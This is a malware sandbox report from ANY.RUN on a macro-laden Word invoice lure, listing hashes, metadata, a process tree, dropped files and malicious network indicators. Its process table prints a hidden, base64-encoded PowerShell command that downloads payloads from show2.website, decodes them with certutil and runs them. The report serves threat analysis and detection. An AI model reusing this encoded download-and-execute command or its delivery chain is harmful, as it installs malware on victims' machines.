analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

gpay_Invoice.doc

Full analysis: https://app.any.run/tasks/074b5f0f-706e-437e-8646-c986f1249234
Verdict: Malicious activity
Analysis date: March 30, 2020, 20:45:54
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Author: user, Template: Normal, Last Saved By: User, Revision Number: 17, Name of Creating Application: Microsoft Office Word, Total Editing Time: 16:00, Create Time/Date: Mon Mar 23 21:08:00 2020, Last Saved Time/Date: Mon Mar 30 15:05:00 2020, Number of Pages: 1, Number of Words: 91, Number of Characters: 519, Security: 0
MD5:

4A401D041E4208772C05DECCF0B614BB

SHA1:

03F669BF1BB6E40F5677F6A65C6F7583CC0F3FCF

SHA256:

734A56F1E63DCEA04A5454D009AF25002B3FE58BB493EEB3CE7F77112B6B9776

SSDEEP:

3072:jeijcTqxcqr3fYp0koMP21RCERChq+hr0vvvvyGPPPPPjZsWcc8qsFimBx+knro2:J8qsFiMx+kroLU

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    No malicious indicators.
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2684)
      • powershell.exe (PID: 3836)
    • Executed via WMI

      • powershell.exe (PID: 2684)
    • PowerShell script executed

      • powershell.exe (PID: 2684)
      • powershell.exe (PID: 3836)
    • Starts CertUtil for decode files

      • powershell.exe (PID: 2684)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 660)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 660)
    • Manual execution by user

      • cmd.exe (PID: 2988)
      • powershell.exe (PID: 3836)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (80)

EXIF

FlashPix

CompObjUserType: -
CompObjUserTypeLen: -
HeadingPairs:
  • Название
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 15
CharCountWithSpaces: 609
Paragraphs: 1
Lines: 4
Company: diakov.net
CodePage: Unicode (UTF-8)
Security: None
Characters: 519
Words: 91
Pages: 1
ModifyDate: 2020:03:30 14:05:00
CreateDate: 2020:03:23 21:08:00
TotalEditTime: 16.0 minutes
Software: Microsoft Office Word
RevisionNumber: 17
LastModifiedBy: User
Template: Normal
Comments: -
Keywords: -
Author: user
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
43
Monitored processes
5
Malicious processes
0
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs powershell.exe no specs certutil.exe no specs cmd.exe no specs powershell.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
660"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\gpay_Invoice.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2684powershell -windowstyle hidden -en SQBtAHAAbwByAHQALQBNAG8AZAB1AGwAZQAgAEIAaQB0AHMAVAByAGEAbgBzAGYAZQByADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIABoAHQAdABwADoALwAvAHMAaABvAHcAMgAuAHcAZQBiAHMAaQB0AGUALwBnAGUAWgBqAFMALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAG4ATQBiAGQALgBkAGEAdAAsAGgAdAB0AHAAOgAvAC8AcwBoAG8AdwAyAC4AdwBlAGIAcwBpAHQAZQAvAGEAYwBQAE0AUQAuAGQAYQB0ACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAiACQAZQBuAHYAOgBUAEUATQBQAFwAdABrAG8AbABkAC4AYwBvAG0AIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXAB4AHQAZAA0ADIAIgAsACIAJABlAG4AdgA6AFQARQBNAFAAXABhAGMAUABNAFEALgBjAG8AbQAiADsAIABTAGUAdAAtAEwAbwBjAGEAdABpAG8AbgAgAC0AUABhAHQAaAAgACIAJABlAG4AdgA6AFQARQBNAFAAIgA7ACAAYwBlAHIAdAB1AHQAaQBsACAALQBkAGUAYwBvAGQAZQAgAHgAdABkADQAMgAgAHkAMgA5AHgAMwA7ACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAAdABrAG8AbABkACAALQBBAHIAZwB1AG0AZQBuAHQATABpAHMAdAAgAHkAMgA5AHgAMwA=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewmiprvse.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
1
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
3032"C:\Windows\system32\certutil.exe" -decode xtd42 y29x3C:\Windows\system32\certutil.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2147942402
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
2988"C:\Windows\system32\cmd.exe" C:\Windows\system32\cmd.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
3221225786
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3836"C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exe" C:\WINDOWS\system32\WindowsPowerShell\v1.0\powershell.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
2 006
Read events
1 233
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
4
Text files
1
Unknown types
2

Dropped files

PID
Process
Filename
Type
660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR72B7.tmp.cvr
MD5:
SHA256:
2684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\BCACT4CJYD149505SMQL.temp
MD5:
SHA256:
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2PAZT5006O1TQSXG66H6.temp
MD5:
SHA256:
660WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:477916EFB88A373723F281B8A9BC2EA4
SHA256:F8C4753F90B6CCCCFB7FC260ACCB0BA935A8E56898FCB3BBF10845FF3B8EE27B
2684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa67edd.TMPbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:55D97CA8F38CAE571B9924AB32DEE546
SHA256:81171B65E13D7FF50827EDB1665B8B152C0C8045118EAA1374F11C998F6DA37C
660WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ay_Invoice.docpgc
MD5:4096BE169B3F64C6A6B6027CCB801BC6
SHA256:EC96EC9F45256BBD347D780E591F3B9A3938A944FA18566A50300E0BE0F82F9F
3836powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFa958f7.TMPbinary
MD5:55D97CA8F38CAE571B9924AB32DEE546
SHA256:81171B65E13D7FF50827EDB1665B8B152C0C8045118EAA1374F11C998F6DA37C
2684powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:3B712DE36DC1672EC51A90C5EE31744F
SHA256:DDE2E429BD6DAA8AA6C9FED090F7C8B96BB95A0AD3E53FE900F99F21E3780AA1
660WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryRU0419.lextext
MD5:F3B25701FE362EC84616A93A45CE9998
SHA256:B3D510EF04275CA8E698E5B3CBB0ECE3949EF9252F0CDC839E9EE347409A2209
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
3
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
93.126.60.42:80
show2.website
Asmanfaraz Sepahan Isdp (pjs)
IR
malicious

DNS requests

Domain
IP
Reputation
show2.website
  • 93.126.60.42
malicious
dns.msftncsi.com
  • 131.107.255.255
shared

Threats

No threats detected
No debug info